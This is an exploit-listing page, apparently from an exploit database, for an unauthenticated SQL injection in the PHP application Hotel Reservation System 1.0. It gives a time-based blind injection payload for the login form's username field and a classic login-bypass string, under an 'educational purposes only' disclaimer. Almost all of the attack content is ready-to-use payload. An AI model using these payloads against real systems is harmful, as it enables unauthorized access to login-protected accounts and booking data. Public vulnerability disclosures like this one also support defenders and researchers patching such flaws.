Hotel reservation system 1.0 sqli (unauthenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-02-08 |
Type : webapps |
Platform : php
This exploit / vulnerability Hotel reservation system 1.0 sqli (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Hotel Reservation System 1.0 - SQLi (Unauthenticated)
# Google Dork: None
# Date: 01/29/2022
# Exploit Author: Nefrit ID
# Author Website: https://manadocoder.com
# Vendor Homepage: https://github.com/dhruvmullick
# Software Link: https://github.com/dhruvmullick/hotel-reservation-system
# Tested on: Kali Linux & Windows 10
username=u1337#' AND (SELECT 4775 FROM (SELECT(SLEEP(5)))BzJL)-- dvSZ&password=p1337&ok=Submit
I can also bypass login by using the following payload: ' or '1'='1'# on the parameter username
Hotel reservation system 1.0 sqli (unauthenticated)